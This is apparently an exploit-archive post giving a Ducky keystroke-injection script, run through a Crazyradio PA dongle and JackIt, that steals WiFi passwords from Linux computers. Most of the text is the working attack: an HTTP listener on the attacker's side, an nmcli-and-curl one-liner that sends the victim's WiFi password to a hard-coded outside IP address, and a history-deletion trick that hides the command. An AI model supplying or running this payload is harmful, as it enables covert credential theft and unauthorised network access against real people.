Grab WiFi Credentials via Bluetooth
02-28-2023
Linux Ducky script used for grabbing WiFi credentials with the Crazyradio PA dongle.
Ducky scripts can be executed with JackIt.
https://github.com/insecurityofthings/jackit
.Setup
On the attacker server, run Httpry. This listens for any HTTP requests.
./httpry -i eth0
Using the following Ducky script, we want the victim to make a curl request to the attacker's IP address.
This request will display the WiFi password in Httpry.
In Linux, Nmcli can display the WiFi password.
nmcli device wifi show-password
As of 2023, output of this Nmcli command looks like:
SSID: NAME
Security: WPA
Password: PASSWORD
We want to only display the 3rd line using Sed:
nmcli device wifi show-password | sed -n 3p
The full curl command is:
pvar=`nmcli device wifi show-password | sed -n 3p`; curl 62.226.100.253/$pvar
This will only give us the 1st word on the 3rd line. Fix this with Awk:
pvar=`nmcli device wifi show-password | sed -n 3p | awk '{print $2}'`; curl 62.226.100.253/$pvar
"history -d $((HISTCMD-1)) &&" will not save command in Bash history.
Language or Platform: Other
Code:
REM Open terminal and grab Wifi credentials from Linux computer
GUI t
DELAY 200
STRING pvar=`history -d $((HISTCMD-1)) && nmcli device wifi show-password | sed -n 3p | awk '{print $2}'`; curl 62.226.100.253/$pvar
DELAY 200
ENTER
STRING exit
ENTER